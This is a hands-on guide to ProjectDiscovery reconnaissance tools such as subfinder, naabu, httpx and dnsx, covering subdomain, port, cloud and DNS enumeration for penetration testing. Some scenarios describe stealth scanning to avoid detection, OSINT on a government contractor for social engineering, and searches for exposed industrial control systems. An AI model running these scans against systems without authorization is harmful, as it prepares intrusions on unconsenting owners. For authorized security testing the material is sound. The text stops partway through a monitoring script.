ProjectDiscovery Tools Practical Guide
Table of Contents
- Introduction & Methodology
- Discovery Tools
- Enrichment Tools
- Detection Tools
- Utility Tools
- Advanced Workflows
- Real-World Case Studies
Introduction & Methodology
This guide follows penetration testing best practices incorporating OSSTMM, NIST, and PTES methodologies to provide structured, practical approaches to security testing using ProjectDiscovery tools.
Security Testing Phases
- Discovery Phase: Asset identification and attack surface mapping
- Enrichment Phase: Technology identification and service enumeration
- Detection Phase: Vulnerability identification and exploitation
- Analysis Phase: Risk assessment and reporting
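These phases chain together naturally. The sketch below is a minimal end-to-end pass through them; example.com and the file names are placeholders to adapt to your engagement.
# Discovery: enumerate subdomains passively
subfinder -d example.com -silent > discovered.txt
# Enrichment: probe for live web services
httpx -list discovered.txt -silent -o live.txt
# Detection: scan live services for known issues
nuclei -list live.txt -severity medium,high,critical -o findings.txt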
Discovery Tools
1. Subfinder - Passive Subdomain Enumeration
Overview
Subfinder is a passive subdomain discovery tool that leverages multiple data sources to enumerate subdomains without directly interacting with the target.
Installation
go install -v github.com/projectdiscovery/subfinder/v2/cmd/subfinder@latest
Basic Usage
# Basic subdomain enumeration
subfinder -d example.com
# Output to file
subfinder -d example.com -o subdomains.txt
# Use specific sources
subfinder -d example.com -sources virustotal,securitytrails
# Verbose output
subfinder -d example.com -v
Advanced Configuration
Configuration File (~/.config/subfinder/provider-config.yaml)
binaryedge:
- "api_key_here"
censys:
- "api_id:api_secret"
certspotter:
- "api_key_here"
chaos:
- "api_key_here"
fofa:
- "email:api_key"
hunter:
- "api_key_here"
securitytrails:
- "api_key_here"
shodan:
- "api_key_here"
virustotal:
- "api_key_here"
zoomeye:
- "username:password"
Real-World Scenarios
Scenario 1: Corporate Asset Discovery
# Target: Large financial institution
# Objective: Map entire digital footprint
# Step 1: Initial enumeration
subfinder -d megabank.com -o megabank_subs.txt -v
# Step 2: Check multiple TLDs
for tld in com net org io; do
subfinder -d megabank.$tld -o megabank_${tld}_subs.txt
done
# Step 3: Recursive enumeration for discovered domains
cat megabank_subs.txt | while read subdomain; do
subfinder -d $subdomain -o ${subdomain}_recursive.txt
done
# Step 4: Combine and deduplicate
cat *_subs.txt *_recursive.txt | sort -u > megabank_all_subdomains.txt
Scenario 2: Bug Bounty Reconnaissance
# Target: SaaS company with complex infrastructure
# Objective: Find hidden development/staging environments
# Use maximum sources for comprehensive coverage
subfinder -d saascompany.com -all -o saas_subdomains.txt
# Look for common patterns
grep -E "(dev|test|stage|staging|beta|demo|admin|api|internal)" saas_subdomains.txt
# Check for wildcard domains
subfinder -d saascompany.com | grep '\*'
Scenario 3: Red Team Operation
# Target: Government contractor
# Objective: OSINT gathering for social engineering
# Enumerate with rate limiting to avoid detection
subfinder -d contractor.gov -rate-limit 10 -timeout 30 -o contractor_subs.txt
# Focus on high-value targets
grep -E "(mail|vpn|remote|citrix|exchange|owa|admin|portal)" contractor_subs.txt
Advanced Techniques
Custom Wordlist Integration
# Create custom wordlist based on target
echo -e "api\ndev\nstaging\ntest\nbeta\nadmin\nportal\nvpn\nmail\nftp" > custom_subs.txt
# Subfinder is passive-only; feed the wordlist to a DNS bruteforcer such as shuffledns (covered later)
shuffledns -d target.com -w custom_subs.txt -r resolvers.txt
Monitoring and Continuous Discovery
#!/bin/bash
# Script: continuous_subfinder.sh
DOMAIN=$1
SLEEP_TIME=3600 # 1 hour
while true; do
TIMESTAMP=$(date +%Y%m%d_%H%M%S)
subfinder -d $DOMAIN -silent | sort -u > "${DOMAIN}_${TIMESTAMP}.txt"
# Compare with previous results (comm requires sorted input)
if [ -f "previous_subs.txt" ]; then
comm -13 previous_subs.txt "${DOMAIN}_${TIMESTAMP}.txt" > new_subs.txt
if [ -s new_subs.txt ]; then
echo "New subdomains found:"
cat new_subs.txt
fi
fi
cp "${DOMAIN}_${TIMESTAMP}.txt" previous_subs.txt
sleep $SLEEP_TIME
done
Integration with Other Tools
# Pipeline: Subfinder → Httpx → Nuclei
subfinder -d target.com | httpx -silent | nuclei -t vulnerabilities/
2. Naabu - High-Performance Port Scanner
Overview
Naabu is a port scanning tool designed for speed and reliability, capable of scanning thousands of hosts efficiently.
Installation
go install -v github.com/projectdiscovery/naabu/v2/cmd/naabu@latest
Basic Usage
# Scan top 1000 ports
naabu -host example.com
# Scan specific ports
naabu -host example.com -p 80,443,8080,8443
# Scan port range
naabu -host example.com -p 1-1000
# Scan multiple hosts
naabu -list hosts.txt -p 1-65535
Advanced Configuration
Configuration File (~/.config/naabu/config.yaml)
# Rate limiting
rate: 1000
# Threads
c: 25
# Timeout
timeout: 1000
# Interface
interface: eth0
# Custom ports
ports:
- "80,443,8080,8443"
- "22,23,25,53,110,143,993,995"
- "1433,3306,5432,6379,27017"
Real-World Scenarios
Scenario 1: Network Infrastructure Assessment
# Target: Corporate network range
# Objective: Identify all listening services
# Step 1: Discover live hosts first
nmap -sn 192.168.1.0/24 | grep "Nmap scan report" | awk '{print $5}' > live_hosts.txt
# Step 2: Port scan with service detection
naabu -list live_hosts.txt -p 1-65535 -rate 1000 -o all_ports.txt
# Step 3: Focus on critical services
naabu -list live_hosts.txt -p 22,23,25,53,80,135,139,443,445,993,995,3389 -v
# Step 4: Identify unusual services
naabu -list live_hosts.txt -exclude-ports 80,443,22,53 -top-ports 1000
Scenario 2: Cloud Asset Discovery
# Target: AWS infrastructure
# Objective: Map exposed services across regions
# Scan common cloud ports
naabu -list aws_ips.txt -p 22,80,443,8080,8443,3000,5000,8000,9000 -rate 500
# Check for container orchestration
naabu -list aws_ips.txt -p 2375,2376,6443,8001,8080,10250 -v
# Database services
naabu -list aws_ips.txt -p 1433,3306,5432,6379,27017,9200,9300
Scenario 3: Stealth Reconnaissance
# Target: High-security environment
# Objective: Avoid detection while gathering intelligence
# Use slow scan with randomization
naabu -host target.com -rate 50 -timeout 5000 -p 1-1000
# Scan through proxy
naabu -host target.com -proxy http://proxy:8080 -p 80,443
# SYN scan at a reduced rate to keep the traffic profile low
naabu -host target.com -scan-type s -rate 100 -p 1-65535
Advanced Techniques
Custom Port Lists
# Web services
echo "80,443,8080,8443,8000,8888,3000,5000,9000" > web_ports.txt
# Database services
echo "1433,3306,5432,6379,27017,9200,9300,5984,7000,7001" > db_ports.txt
# Use custom lists
naabu -list targets.txt -ports-file web_ports.txt
Integration with Service Detection
# Naabu + Nmap service detection (naabu hands discovered ports to nmap)
naabu -host target.com -nmap-cli 'nmap -sV -sC -oA target_services'
# Naabu + Nuclei for vulnerability scanning
naabu -host target.com -silent | httpx -silent | nuclei -t exposures/
Performance Optimization
# High-performance scanning
naabu -list targets.txt -rate 5000 -c 50 -retries 1 -warm-up-time 2
# Network-optimized scanning
naabu -list targets.txt -interface eth0 -source-ip 192.168.1.100 -rate 2000
3. Katana - Web Crawling Framework
Overview
Katana is a fast web crawling framework designed for comprehensive web asset discovery and parsing.
Installation
go install -v github.com/projectdiscovery/katana/cmd/katana@latest
Basic Usage
# Basic crawling
katana -u https://example.com
# Crawl with depth control
katana -u https://example.com -depth 3
# Output to file
katana -u https://example.com -o crawled_urls.txt
# JSON output
katana -u https://example.com -json -o results.json
Advanced Configuration
Configuration File (~/.config/katana/config.yaml)
# Crawling depth
depth: 3
# Rate limiting
rate-limit: 100
# Timeout settings
timeout: 10
# Headers
headers:
- "User-Agent: Mozilla/5.0 (compatible; KatanaBot/1.0)"
# Form filling
form-config: forms.yaml
Real-World Scenarios
Scenario 1: E-commerce Security Assessment
# Target: Online store
# Objective: Map all pages and identify sensitive endpoints
# Step 1: Deep crawl with authentication
katana -u https://store.com -depth 5 -headless \
-headers "Cookie: session=abc123"
# Step 2: Focus on API endpoints
katana -u https://store.com -silent | grep -iE "/api|/rest|/graphql"
# Step 3: Extract forms and parameters
katana -u https://store.com -form-extraction -o forms.txt
# Step 4: Identify admin panels
katana -u https://store.com | grep -E "(admin|panel|dashboard|manage)"
Scenario 2: Single Page Application (SPA) Testing
# Target: React/Angular application
# Objective: Discover all routes and endpoints
# JavaScript-heavy application crawling
katana -u https://spa-app.com -headless -no-sandbox -depth 4
# Extract endpoints discovered inside JavaScript files
katana -u https://spa-app.com -js-crawl -o js_endpoints.txt
# Monitor XHR requests
katana -u https://spa-app.com -xhr-extraction -json
Scenario 3: Content Discovery for Bug Bounty
# Target: Corporate website
# Objective: Find hidden files and directories
# Comprehensive crawling with multiple strategies
katana -u https://company.com -depth 3 -passive
# Look for sensitive files
katana -u https://company.com | grep -E "\\.(env|config|backup|log|sql)$"
# Extract social media and external links
katana -u https://company.com | grep -E "(facebook|twitter|linkedin|github)"
Advanced Techniques
Custom Field Extraction
# Extract data-* attributes from stored responses
katana -u https://target.com -store-response -store-response-dir responses/
grep -rhoE 'data-[a-zA-Z-]+="[^"]*"' responses/ | sort -u
# Extract API endpoints from JavaScript
katana -u https://target.com -js-crawl | grep -oP "api/v\d+/[^\"']*"
# Extract email addresses
katana -u https://target.com | grep -oE "[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\.[a-zA-Z]{2,}"
Form Analysis
# Extract all forms with their methods and actions
katana -u https://target.com -form-extraction -json | jq '.forms[]'
# Identify file upload endpoints
katana -u https://target.com -form-extraction | grep -i "file\|upload"
Integration Workflows
# Katana → FFUF for directory bruteforcing
katana -u https://target.com | cut -d'/' -f1-3 | sort -u | while read url; do
ffuf -w wordlist.txt -u $url/FUZZ
done
# Katana → Nuclei for vulnerability scanning
katana -u https://target.com | nuclei -t exposures/ -t vulnerabilities/
4. Chaos - Internet-Wide Asset Discovery
Overview
Chaos provides access to internet-wide asset data, offering insights into global infrastructure and enabling comprehensive asset discovery.
Installation
go install -v github.com/projectdiscovery/chaos-client/cmd/chaos@latest
Basic Usage
# Get subdomains for a domain
chaos -d example.com
# Output to file
chaos -d example.com -o chaos_results.txt
# Silent mode
chaos -d example.com -silent
# Count results
chaos -d example.com -count
Configuration
# Configure API key
chaos -update
# Set API key as environment variable
export CHAOS_API_KEY="your_api_key_here"
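Chaos data is historical, so a quick resolution pass with dnsx (covered later in this guide) helps separate live assets from stale entries; a minimal sketch:
# Keep only Chaos entries that still resolve
chaos -d example.com -silent | dnsx -silent > live_chaos.txt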
Real-World Scenarios
Scenario 1: Threat Intelligence Gathering
# Target: Fortune 500 company
# Objective: Map global infrastructure
# Get all known subdomains
chaos -d megacorp.com -o megacorp_chaos.txt
# Cross-reference with current DNS (resolve each entry)
while read sub; do dig +short "$sub"; done < megacorp_chaos.txt | sort -u > megacorp_ips.txt
# Identify cloud providers
cat megacorp_ips.txt | while read ip; do
whois $ip | grep -E "(AWS|Amazon|Microsoft|Google|Azure)"
done
Scenario 2: Acquisition Intelligence
# Target: Recently acquired company
# Objective: Identify legacy infrastructure
# Compare pre/post acquisition assets
chaos -d oldcompany.com -o pre_acquisition.txt
chaos -d newparent.com -o post_acquisition.txt
# Find potential overlooked assets (comm requires sorted input)
comm -23 <(sort pre_acquisition.txt) <(sort post_acquisition.txt) > orphaned_assets.txt
Scenario 3: Supply Chain Analysis
# Target: Software vendor
# Objective: Map vendor relationships
# Get vendor's infrastructure
chaos -d vendor.com -o vendor_assets.txt
# Look for customer-specific subdomains
grep -E "(client|customer|[0-9]{4,})" vendor_assets.txt
# Identify hosting patterns
cat vendor_assets.txt | cut -d'.' -f2- | sort | uniq -c | sort -nr
Advanced Integration
Chaos + Historical Analysis
#!/bin/bash
# Track infrastructure changes over time
DOMAIN=$1
DATE=$(date +%Y%m%d)
chaos -d $DOMAIN -o "chaos_${DOMAIN}_${DATE}.txt"
# Compare with previous month
if [ -f "chaos_${DOMAIN}_previous.txt" ]; then
echo "New assets discovered:"
comm -13 "chaos_${DOMAIN}_previous.txt" "chaos_${DOMAIN}_${DATE}.txt"
echo "Assets removed:"
comm -23 "chaos_${DOMAIN}_previous.txt" "chaos_${DOMAIN}_${DATE}.txt"
fi
5. Uncover - Search Engine for Exposed Assets
Overview
Uncover searches multiple search engines (Shodan, Censys, Fofa, etc.) to find exposed hosts and services.
Installation
go install -v github.com/projectdiscovery/uncover/cmd/uncover@latest
Basic Usage
# Search across all engines
uncover -q "apache"
# Search specific engine
uncover -q "nginx" -e shodan
# Search by IP range
uncover -q "ip:192.168.1.0/24"
# Limit results
uncover -q "port:443" -limit 100
Configuration
# ~/.config/uncover/provider-config.yaml
shodan: ["api_key_here"]
censys: ["api_id:api_secret"]
fofa: ["email:api_key"]
hunter: ["api_key_here"]
zoomeye: ["username:password"]
Real-World Scenarios
Scenario 1: IoT Security Assessment
# Target: Organization's IoT devices
# Objective: Identify exposed industrial control systems
# Search for common IoT protocols
uncover -q "port:502,503,102" -e shodan,censys | grep organization.com
# Look for webcams and IP cameras
uncover -q "webcam" -q "organization.com" -limit 50
# Industrial systems
uncover -q "scada OR ics OR plc" -q "organization.com"
Scenario 2: Cloud Misconfigurations
# Target: Company's cloud infrastructure
# Objective: Find exposed cloud services
# Exposed databases
uncover -q "mongodb" -q "company.com" -e shodan
uncover -q "elasticsearch" -q "company.com" -e censys
# Open directory listings (often misconfigured storage)
uncover -q "http.title:Index of /" -q "company.com"
# Exposed Docker APIs
uncover -q "port:2375,2376" -q "company.com"
Scenario 3: Attack Surface Monitoring
# Target: Critical infrastructure
# Objective: Continuous monitoring for new exposures
#!/bin/bash
# Script: monitor_exposure.sh
COMPANY=$1
# Monitor critical services
for service in "rdp" "vnc" "ssh" "ftp" "telnet"; do
uncover -q "$service" -q "$COMPANY" -json > "${service}_exposure_$(date +%Y%m%d).json"
done
# Check for new exposures (comm requires sorted input)
uncover -q "$COMPANY" -limit 1000 | sort -u | comm -13 previous_exposure.txt - > new_exposures.txt
Advanced Queries
Complex Search Patterns
# Multiple conditions
uncover -q "port:80,443 AND title:login AND org:target"
# Technology stack identification
uncover -q "http.server:nginx AND http.title:admin AND target.com"
# Vulnerability-specific searches
uncover -q "http.title:phpMyAdmin AND target.com"
uncover -q "port:23 AND banner:password AND target.com"
6. Cloudlist - Multi-Cloud Asset Enumeration
Overview
Cloudlist enumerates assets across multiple cloud providers (AWS, GCP, Azure, DigitalOcean) to provide comprehensive cloud visibility.
Installation
go install -v github.com/projectdiscovery/cloudlist/cmd/cloudlist@latest
Configuration
# ~/.config/cloudlist/config.yaml
aws:
- id: AKIA...
secret: xxxx
region: us-east-1
gcp:
- service_account_path: /path/to/service-account.json
azure:
- tenant_id: xxx
client_id: xxx
client_secret: xxx
subscription_id: xxx
digitalocean:
- token: xxx
Basic Usage
# List all instances across providers
cloudlist
# Specific provider
cloudlist -provider aws
# Specific resource type
cloudlist -provider aws -resource ec2
# Output formats
cloudlist -json
cloudlist -csv
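For quick triage, the inventory can be reduced to IP addresses and piped straight into a port scanner; a minimal sketch assuming the -ip output filter:
# IP-only output piped into naabu
cloudlist -provider aws -ip -silent | naabu -top-ports 100 -silent -o cloud_exposure.txt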
Real-World Scenarios
Scenario 1: Multi-Cloud Security Assessment
# Target: Enterprise with multi-cloud setup
# Objective: Comprehensive cloud asset inventory
# Generate complete inventory
cloudlist -json > cloud_inventory.json
# Extract public IPs
jq -r '.[] | select(.public_ipv4 != null) | .public_ipv4' cloud_inventory.json > public_ips.txt
# Identify high-risk instances
jq -r '.[] | select(.public_ipv4 != null and .private_ipv4 != null) | [.provider, .resource, .public_ipv4, .tags] | @csv' cloud_inventory.json
Scenario 2: Shadow IT Discovery
# Target: Large organization
# Objective: Find unauthorized cloud resources
# Get all AWS resources across regions
for region in us-east-1 us-west-2 eu-west-1; do
cloudlist -provider aws -region $region -json > aws_${region}.json
done
# Identify resources without proper tags
jq -r '.[] | select(.tags.Department == null or .tags.Owner == null)' aws_*.json
# Find old/abandoned resources
jq -r '.[] | select(.created_time < "2023-01-01")' aws_*.json
Scenario 3: Compliance Monitoring
# Target: Regulated industry
# Objective: Ensure compliance with data residency requirements
# Check for resources in non-compliant regions
cloudlist -provider aws -json | jq -r '.[] | select(.region | test("ap-|sa-")) | [.resource, .region, .public_ipv4] | @csv'
# Identify unencrypted storage
cloudlist -provider aws -resource s3 -json | jq -r '.[] | select(.encryption == false)'
Advanced Integration
Automated Security Scanning
#!/bin/bash
# Script: cloud_security_scan.sh
# Get all public IPs
cloudlist -json | jq -r '.[] | select(.public_ipv4 != null) | .public_ipv4' > cloud_ips.txt
# Port scan cloud assets
naabu -list cloud_ips.txt -top-ports 1000 -o cloud_ports.txt
# Web service enumeration
cat cloud_ips.txt | httpx -silent | nuclei -t exposures/
7. ASNmap - Autonomous System Mapping
Overview
ASNmap maps organization network ranges using ASN information, providing comprehensive network infrastructure visibility.
Installation
go install -v github.com/projectdiscovery/asnmap/cmd/asnmap@latest
Basic Usage
# Get ASN info for domain
asnmap -d example.com
# Get ASN info for IP
asnmap -ip 8.8.8.8
# Get all IPs for ASN
asnmap -asn AS15169
# Output CIDR ranges
asnmap -org "Google LLC" -cidr
Real-World Scenarios
Scenario 1: Corporate Network Mapping
# Target: Large corporation
# Objective: Map entire network infrastructure
# Get organization's ASNs
asnmap -org "Mega Corporation" -json > megacorp_asns.json
# Extract all CIDR ranges
jq -r '.[] | .cidr[]?' megacorp_asns.json > megacorp_cidrs.txt
# Get all individual IPs
asnmap -org "Mega Corporation" -silent > megacorp_ips.txt
# Scan the network ranges
cat megacorp_cidrs.txt | while read cidr; do
naabu -host $cidr -top-ports 100 -o scan_${cidr//\//_}.txt
done
Scenario 2: Supply Chain Analysis
# Target: Software vendor and customers
# Objective: Map vendor-customer relationships
# Get vendor's network ranges
asnmap -org "Software Vendor Inc" -cidr > vendor_cidrs.txt
# Check for customer connections
cat customer_list.txt | while read customer; do
echo "=== $customer ==="
asnmap -org "$customer" -cidr
done
Scenario 3: Threat Intelligence
# Target: Suspicious infrastructure
# Objective: Map malicious infrastructure
# Get ASN info for suspicious IPs
cat suspicious_ips.txt | while read ip; do
asnmap -ip $ip -json
done > suspicious_asns.json
# Identify hosting providers
jq -r '.[] | [.ip, .org, .country] | @csv' suspicious_asns.json
# Find related infrastructure
jq -r '.[] | .asn' suspicious_asns.json | sort -u | while read asn; do
asnmap -asn $asn -silent
done
8. Alterx - Subdomain Wordlist Generator
Overview
Alterx generates custom subdomain wordlists using a domain-specific language (DSL) for targeted subdomain discovery.
Installation
go install -v github.com/projectdiscovery/alterx/cmd/alterx@latest
Basic Usage
# Generate variations
echo "api" | alterx
# Use patterns
echo "{{word}}-{{number}}" | alterx -p
# Multiple inputs
echo -e "api\ndev\ntest" | alterx
# Output to file
echo "admin" | alterx -o admin_variations.txt
DSL Patterns
# Number patterns
echo "{{word}}{{number:1-100}}" | alterx
# Date patterns
echo "{{word}}-{{year}}" | alterx
# Custom patterns
echo "{{word}}.{{env}}.{{region}}" | alterx -env dev,test,prod -region us,eu
Real-World Scenarios
Scenario 1: API Endpoint Discovery
# Target: SaaS application
# Objective: Discover API versions and endpoints
# Generate API patterns
echo -e "api\napi-v1\napi-v2\nrest\ngraphql" | alterx -p "{{word}}.{{env}}" -env "dev,staging,prod"
# Versioning patterns
echo "api" | alterx -p "{{word}}{{version}}" -version "v1,v2,v3,1,2,3"
# Regional patterns
echo "api" | alterx -p "{{region}}-{{word}}" -region "us-east,us-west,eu-west,ap-south"
Scenario 2: Development Environment Discovery
# Target: Development team
# Objective: Find dev/test environments
# Environment-based patterns
echo -e "app\nportal\ndashboard" | alterx -p "{{env}}-{{word}}" -env "dev,test,staging,qa,demo,beta"
# Developer-specific patterns
echo "dev" | alterx -p "{{word}}-{{name}}" -name "john,jane,mike,sarah"
# Feature branch patterns
echo "feature" | alterx -p "{{word}}-{{feature}}" -feature "auth,payment,api,ui"
Scenario 3: Infrastructure Pattern Analysis
# Target: Large enterprise
# Objective: Understand naming conventions
# Geographic patterns
echo -e "mail\nvpn\nportal" | alterx -p "{{location}}-{{word}}" -location "nyc,lon,tok,syd"
# Departmental patterns
echo "intranet" | alterx -p "{{dept}}-{{word}}" -dept "hr,finance,it,legal,marketing"
# Infrastructure patterns
echo "server" | alterx -p "{{word}}{{number:01-99}}" > server_patterns.txt
Advanced Pattern Generation
Custom Dictionary Integration
# Use organization-specific terms
echo -e "internal\nconfidential\nrestricted" | alterx -p "{{word}}-{{classification}}" -classification "public,private,secret"
# Technology stack patterns
echo "app" | alterx -p "{{word}}-{{tech}}" -tech "java,python,nodejs,php,dotnet"
Integration with Discovery Tools
# Generate patterns and resolve the candidates with dnsx
echo "api" | alterx -p "{{word}}-{{env}}" | while read pattern; do
echo "${pattern}.target.com"
done | dnsx -silent
# Combine with brute force tools
echo "admin" | alterx > admin_patterns.txt
gobuster dns -d target.com -w admin_patterns.txt
9. Shuffledns - DNS Bruteforce with Wildcard Handling
Overview
Shuffledns is a wrapper around massDNS for bruteforcing subdomains with advanced wildcard detection and handling.
Installation
go install -v github.com/projectdiscovery/shuffledns/cmd/shuffledns@latest
Prerequisites
# Install massDNS
git clone https://github.com/blechschmidt/massdns.git
cd massdns
make
sudo cp bin/massdns /usr/local/bin/
Basic Usage
# Basic bruteforce
shuffledns -d example.com -w wordlist.txt
# Use custom resolvers
shuffledns -d example.com -w wordlist.txt -r resolvers.txt
# Output to file
shuffledns -d example.com -w wordlist.txt -o discovered.txt
# Wildcard filtering
shuffledns -d example.com -w wordlist.txt -wt 10
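Besides bruteforcing, shuffledns can mass-resolve an existing candidate list through massDNS; a hedged sketch (newer releases select this behaviour with -mode resolve):
# Resolve a pre-generated candidate list
shuffledns -d example.com -list candidates.txt -r resolvers.txt -mode resolve -o resolved.txt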
Real-World Scenarios
Scenario 1: Comprehensive Subdomain Discovery
# Target: E-commerce platform
# Objective: Find all subdomains including wildcards
# Create comprehensive wordlist
cat /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-110000.txt \
/usr/share/wordlists/SecLists/Discovery/DNS/fierce-hostlist.txt > comprehensive.txt
# Run with wildcard detection
shuffledns -d ecommerce.com -w comprehensive.txt -wt 5 -t 100 -o ecommerce_subs.txt
# Validate results
cat ecommerce_subs.txt | httpx -silent -o valid_subdomains.txt
Scenario 2: CDN and Load Balancer Discovery
# Target: Global service provider
# Objective: Map CDN infrastructure
# Geographic patterns
echo -e "cdn\nstatic\nassets\nmedia\nimages" > cdn_words.txt
shuffledns -d globalservice.com -w cdn_words.txt -wt 3
# Numeric patterns for load balancers
seq 1 100 | sed 's/^/lb/' > lb_numbers.txt
shuffledns -d globalservice.com -w lb_numbers.txt
Scenario 3: Legacy System Discovery
# Target: Acquired company
# Objective: Find forgotten legacy systems
# Old naming conventions
echo -e "old\nlegacy\narchive\nbackup\ntest\ndev\nstaging" > legacy_words.txt
# Year-based patterns
for year in {2010..2020}; do echo "system$year"; done > year_patterns.txt
# Technology-specific patterns
echo -e "exchange\nsharepoint\ncitrix\nvmware\njenkins" > tech_words.txt
# Combine and test
cat legacy_words.txt year_patterns.txt tech_words.txt > legacy_combined.txt
shuffledns -d acquired-company.com -w legacy_combined.txt -wt 5
Advanced Configuration
Custom Resolver Lists
# Create high-quality resolver list
echo -e "8.8.8.8\n8.8.4.4\n1.1.1.1\n1.0.0.1" > resolvers.txt
# Or pull a maintained public resolver list for broader coverage
wget -q https://raw.githubusercontent.com/trickest/resolvers/main/resolvers.txt -O resolvers.txt
Performance Optimization
# High-performance configuration
shuffledns -d target.com -w huge_wordlist.txt -t 500 -wt 10 -retries 2 -timeout 3
Integration Workflows
# Shuffledns → Httpx → Nuclei pipeline
shuffledns -d target.com -w wordlist.txt -silent | \
httpx -silent -follow-redirects | \
nuclei -t technologies/ -silent
Enrichment Tools
10. Httpx - HTTP Toolkit for Reconnaissance
Overview
Httpx is a fast HTTP toolkit for probing services, identifying web servers, and gathering HTTP metadata.
Installation
go install -v github.com/projectdiscovery/httpx/cmd/httpx@latest
Basic Usage
# Probe URLs
echo "https://example.com" | httpx
# Probe from file
httpx -list urls.txt
# Show response status
httpx -list urls.txt -status-code
# Extract titles
httpx -list urls.txt -title
Advanced Features
Technology Detection
# Detect web technologies
httpx -list urls.txt -tech-detect
# Server headers
httpx -list urls.txt -server
# Response headers
httpx -list urls.txt -response-headers
Content Analysis
# Extract page titles and content length
httpx -list urls.txt -title -content-length
# Response time analysis
httpx -list urls.txt -response-time
# Status code filtering
httpx -list urls.txt -mc 200,301,302
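These options combine, which makes quick triage of large URL lists a single pass; for example:
# Triage: drop error pages, keep title, status and size in one pass
httpx -list urls.txt -title -status-code -content-length -fc 404,502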
Real-World Scenarios
Scenario 1: Large-Scale Web Asset Enumeration
# Target: Fortune 500 company
# Objective: Map all web services and technologies
# Step 1: Get all subdomains
subfinder -d megacorp.com -silent > megacorp_subs.txt
# Step 2: Probe all HTTP services
cat megacorp_subs.txt | httpx -silent -threads 50 -timeout 10 > megacorp_http.txt
# Step 3: Technology stack analysis
cat megacorp_http.txt | httpx -tech-detect -json > megacorp_tech.json
# Step 4: Extract critical information (httpx -json emits one object per line)
jq -r '[.url, ((.tech // []) | join(";")), .status_code, .title] | @csv' megacorp_tech.json > technology_matrix.csv
# Step 5: Identify high-value targets
grep -E "(admin|login|portal|dashboard)" megacorp_http.txt > high_value_targets.txt
Scenario 2: API Discovery and Analysis
# Target: API-heavy application
# Objective: Discover and analyze API endpoints
# Probe for API endpoints
echo -e "api\napi-v1\napi-v2\nrest\ngraphql\nv1\nv2\nv3" | \
while read api; do echo "https://target.com/$api"; done | \
httpx -silent -mc 200,401,403
# Check for API documentation
echo -e "docs\napi-docs\nswagger\nopenapi\ngraphiql" | \
while read doc; do echo "https://target.com/$doc"; done | \
httpx -title -mc 200
# Analyze API responses
cat api_endpoints.txt | httpx -json -content-type > api_analysis.json
jq -r 'select(.content_type != null and (.content_type | contains("json"))) | .url' api_analysis.json
Scenario 3: Security Header Analysis
# Target: Security-conscious organization
# Objective: Assess security header implementation
# Check security headers
cat domains.txt | httpx -response-headers -json | \
jq -r '.[] | [.url, .headers["strict-transport-security"], .headers["content-security-policy"], .headers["x-frame-options"]] | @csv'
# Identify missing security headers
cat domains.txt | httpx -json | \
jq -r '.[] | select(.headers["strict-transport-security"] == null or .headers["content-security-policy"] == null) | .url'
# Check for information disclosure
cat domains.txt | httpx -server -tech-detect | grep -E "(nginx|apache|iis).*[0-9]"
Advanced Techniques
Custom HTTP Methods
# Test different HTTP methods
for method in GET POST PUT DELETE PATCH OPTIONS; do
echo "https://target.com/api/users" | httpx -method $method -silent
done
# Method enumeration
cat endpoints.txt | httpx -method OPTIONS -response-headers | grep -i allow
Response Analysis
# Content-based filtering
httpx -list urls.txt -match-string "admin"
httpx -list urls.txt -filter-string "404"
# Response size analysis
httpx -list urls.txt -content-length | awk '$2 > 10000'
# Custom header injection
httpx -list urls.txt -header "X-Forwarded-For: 127.0.0.1"
Pipeline Integration
# Complete reconnaissance pipeline
subfinder -d target.com -silent | \
httpx -silent -tech-detect -title -status-code | \
tee web_assets.txt | \
nuclei -t exposures/ -silent
11. DNSx - DNS Toolkit
Overview
DNSx is a fast DNS toolkit for multiple DNS operations including resolution, wildcard testing, and DNS record enumeration.
Installation
go install -v github.com/projectdiscovery/dnsx/cmd/dnsx@latest
Basic Usage
# Resolve domains
echo "example.com" | dnsx
# Multiple domains
cat domains.txt | dnsx
# Specific record types
echo "example.com" | dnsx -a -aaaa -cname -mx
# Wildcard testing
echo "example.com" | dnsx -wildcard
Advanced Features
DNS Record Enumeration
# All record types
echo "example.com" | dnsx -a -aaaa -cname -mx -ns -txt -srv
# Reverse DNS lookup
echo "8.8.8.8" | dnsx -ptr
# DNS over HTTPs
echo "example.com" | dnsx -doh
Mass Operations
# Resolve large lists
cat million_domains.txt | dnsx -threads 100
# Response filtering
cat domains.txt | dnsx -resp-only
# JSON output
cat domains.txt | dnsx -json
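dnsx also accepts CIDR input, so reverse-lookup sweeps across a network range are a one-liner:
# PTR sweep across a /24 (the CIDR is expanded automatically)
echo "192.168.1.0/24" | dnsx -silent -ptr -resp-only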
Real-World Scenarios
Scenario 1: DNS Infrastructure Analysis
# Target: Enterprise network
# Objective: Map DNS infrastructure and identify misconfigurations
# Step 1: Enumerate all DNS records
cat enterprise_domains.txt | dnsx -a -aaaa -cname -mx -ns -txt -json > dns_records.json
# Step 2: Identify DNS servers
jq -r 'select(.ns != null) | .ns[]?' dns_records.json | sort -u > dns_servers.txt
# Step 3: Check for DNS misconfigurations
# Zone transfer attempts
cat dns_servers.txt | while read ns; do
dig @$ns enterprise.com axfr
done
# SPF record analysis
jq -r 'select(.txt != null) | .txt[]? | select(. | contains("spf"))' dns_records.json
# Step 4: Identify subdomain takeover opportunities
jq -r 'select(.cname != null) | [.host, (.cname | join(";"))] | @csv' dns_records.json > cname_targets.csv
Scenario 2: Cloud Migration Assessment
# Target: Company migrating to cloud
# Objective: Track DNS changes and identify legacy infrastructure
# Pre-migration snapshot
cat company_domains.txt | dnsx -a -aaaa -json > pre_migration_dns.json
# Post-migration comparison
cat company_domains.txt | dnsx -a -aaaa -json > post_migration_dns.json
# Identify changes
jq -r '[.host, .a[]?] | @csv' pre_migration_dns.json | sort > pre_ips.txt
jq -r '[.host, .a[]?] | @csv' post_migration_dns.json | sort > post_ips.txt
comm -13 post_ips.txt pre_ips.txt > legacy_ips.txt
# Analyze cloud provider distribution
jq -r '.a[]?' post_migration_dns.json | while read ip; do
whois $ip | grep -E "(AWS|Amazon|Microsoft|Google|Azure)"
done | sort | uniq -c
Scenario 3: Threat Intelligence and Monitoring
# Target: Critical infrastructure
# Objective: Monitor for suspicious DNS changes
# Daily DNS monitoring
DATE=$(date +%Y%m%d)
cat critical_domains.txt | dnsx -a -json > "dns_snapshot_$DATE.json"
# Compare with previous day
if [ -f "dns_snapshot_$(date -d yesterday +%Y%m%d).json" ]; then
# Extract A records
jq -r '.[] | [.host, .a[]] | @csv' "dns_snapshot_$DATE.json" | sort > today_dns.txt
